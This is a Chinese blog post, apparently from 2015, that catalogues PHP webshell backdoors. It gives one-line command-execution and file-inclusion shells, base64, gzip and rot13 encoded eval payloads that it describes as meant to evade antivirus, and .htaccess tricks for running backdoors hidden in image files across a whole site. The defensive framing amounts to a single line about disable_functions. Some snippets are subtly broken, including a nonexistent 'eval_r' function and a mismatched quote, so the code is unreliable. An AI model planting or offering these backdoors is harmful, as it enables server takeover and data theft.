php 木马 加密,PHP木马大全 一句话的PHP木马的防范
PHP木马大全 一句话的PHP木马的防范
(2015-01-28 22:12:07)
标签:
it
分类:
php
php后门木马常用的函数大致上可分为四种类型:
1. 执行系统命令: system, passthru, shell_exec, exec, popen,
proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode,
gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once,
file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file,
auto_append_file
1. 执行系统命令:
system 函数
//test.php?cmd=ls
system($_GET[cmd]);
passthru 函数
//test.php?cmd=ls
passthru($_GET[cmd]);
shell_exec 函数
//test.php?cmd=ls
echo shell_exec($_GET[cmd]);
exec 函数
//test.php?cmd=ls
$arr = array();
exec($_GET[cmd],$arr);
print_r($arr);
popen 函数
//test.php?cmd=ls
$handle = popen('$_GET[cmd], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);
proc_open 函数
//test.php?cmd=ls
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w'),
);
$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output,
rtrim(fgets($pipes[1],1024),"\n"));
print_r($output);
2. 代码执行与加密:
eval 函数
//最常见的一句话木马
eval_r($_POST[cmd]);
base64_decode 函数
//为了免杀及隐藏而加密代码
//密文: eval_r($_POST['cmd']);
eval_r(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
gzinflate 函数
//为了免杀及隐藏而加密代码
//密文: eval_r($_POST['cmd']);
eval_r(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
gzuncompress 函数
//为了免杀及隐藏而加密代码
//密文: eval_r($_POST['cmd']);
eval_r(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
gzdecode 函数
//为了免杀及隐藏而加密代码
//密文: eval_r($_POST['cmd']);
eval_r(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
str_rot13 函数
//为了免杀及隐藏而加密代码
//密文: eval_r($_POST[cmd]);
eval_r(str_rot13('riny($_CBFG[pzq]);'));
assert 函数
//类似eval函数
assert($_POST[cmd]);
call_user_func 函数
//使用call_user_func调用assert
call_user_func('assert',$_POST[cmd]);
call_user_func 函数
//使用call_user_func调用任意函数
//test.php?a=assert&cmd=phpinfo()
call_user_func($_GET[a],$_REQUEST[cmd]);
组合代码
//组合方式调用任意函数
//test.php?a=assert&cmd=phpinfo()
$_GET[a]($_REQUEST[cmd]);
3. 文件包含与生成:
require 函数
//包含任意文件
//test.php?file=123.jpg
require($_GET[file]);
require_once 函数
//包含任意文件
//test.php?file=123.jpg
require_once($_GET[file]);
include 函数
//包含任意文件 www.jb51.net
//test.php?file=123.jpg
include($_GET[file]);
include_once 函数
//包含任意文件
//test.php?file=123.jpg
include_once($_GET[file]);
file_get_contents 函数
//读取任意文件
//test.php?f=config.inc.php
echo file_get_contents($_GET['f']);
file_put_contents 函数
//生成任意内容文件
//a=test.php&b=
file_put_contents($_GET[a],$_GET[b]);
fputs 函数
//生成任意内容文件
//a=test.php&b=
fputs(fopen($_GET[a],"w"),$_GET[b]);
4. .htaccess:
SetHandler
//可将php代码存于非php后缀文件,例: x.jpg
//将以下代码写入.htaccess中
//连接x.jpg即可启动后门木马出处www.admin8.us
SetHandler application/x-httpd-php
auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
//可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马
php_value auto_prepend_file c:/apache2/htdocs/123.gif
auto_append_file
//类似auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
php_value auto_append_file c:/apache2/htdocs/123.gif
防范方法:通过禁止危险函数 php.ini中设置disable_functions详情可以参考下 http://www.jb51.net/article/19292.htm
分享:
喜欢
0
赠金笔
加载中,请稍候......
评论加载中,请稍候...
发评论
登录名: 密码: 找回密码 注册记住登录状态
昵 称:
评论并转载此博文
发评论
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。
php 木马 加密,PHP木马大全 一句话的PHP木马的防范相关推荐
- php 木马 加密,PHP后门木马详解
说起php后门木马我就心有愉季啊前不久一个站就因不小心给人注入了然后写入了小木马这样结果大家知道的我就不说了下面我来给大家收集了各种php后门木马做法大家可参考. php后门木马对大家来说一点都不陌生 ...
- php7版本一句话木马,一句话查找 PHP 木马
一句话查找 PHP 木马 find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpres ...
- php一句话图片木马怎么运行,php型一句话木马怎么写
php型一句话木马怎么写? PHP一句话木马 一: 关于PHP的一句话木马:<?php $a=$_POST['H']; eval("$a");//eval会将输入的$a作为p ...
- 【安全硬件】Chap.5 如何检测芯片中硬件木马?硬件木马的类型有哪些?检测硬件木马的技术
[安全硬件]Chap.5 如何检测芯片中硬件木马?硬件木马的类型有哪些?检测硬件木马的技术 前言 1. 硬件木马的种类 1.1 硬件木马 1.2 硬件木马的区分 1.1 物理特性类别硬件木马--Phy ...
- 2019年上半年挖矿木马报告:日均新增6万个木马样本
一.概述 比特币在经历了2018年大幅下跌之后,在2019年上半年又重新恢复上涨,在6月底达到13000美元/BTC,接近历史最高水平17000美元/BTC. 随着比特币的飙升,推动整个数字加密货币价 ...
- vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器
一.背景介绍 Metasploit就是一个漏洞框架.它的全称叫做The Metasploit Framework,简称叫做MSF.Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强 ...
- 微信表情代码大全---一句话搞定
微信表情代码大全---一句话搞定(转载请注明) 我的应用场景 结果截图 部分代码 重磅技巧 再也不需要对着网上的微信表情代码文档找寻自己想要的了,再也不用纠结继续找寻更全的文档了.真的只需要复制粘贴? ...
- 木马冰河之原理篇(深入浅出看木马)
主题:木马冰河之原理篇(转载) 在网上,大家最关心的事情之一就是木马:最近出了新的木马吗?木马究竟能实现哪些功能?木马如何防治?木马究竟是如何工作的?本文试图以我国最著名的木马之一 冰河为例,向大家剖 ...
- 计算机木马的特点 分类 危害,计算机网络病毒的分析与防范
计算机网络病毒的分析与防范 (66页) 本资源提供全文预览,点击全文预览即可全文预览,如果喜欢文档就下载吧,查找使用更方便哦! 25.9 积分 毕业设计论文题目:计算机网络病毒的分析与防范系/专业:计 ...
最新文章
- awk4.0 — awk格式化
- python3数字全排列怎么搞_python使用递归解决全排列数字示例
- C++使用数组的链表实现(附完整源码)
- 常用的数学计算工具类
- python图像对比度增强图片清晰度_Python 图像对比度增强的几种方法(小结)
- 悲痛!临近年关,一位 IT 创业者自杀,曾卖房给员工发工资
- 国产Linux二十年揭秘
- 高斯光束matlab 仿真,高斯光束的matlab仿真
- 微信小程序使用 wxparse 解析 iframe腾讯视频
- Html基本标签(斜体em、空格nbsp、段落p、标题h1、换行br、大于号gt、小于号lt、引号quot、版权符号copy、图片img、水平线hr)
- PyQt4转PyQt5心得
- Java语言与开发环境
- 在线客服——各第三方的收费标准及服务提供
- Linux rpm 文件安装
- 推荐这三款软件让你实现图片去雾化?
- 笔记本电脑添加打印机
- Linux指令——crontab
- 平衡二叉树(C++) -- 左旋旋右旋旋
- matplotlib绘制三维曲面图
- Java学习之操作符(三)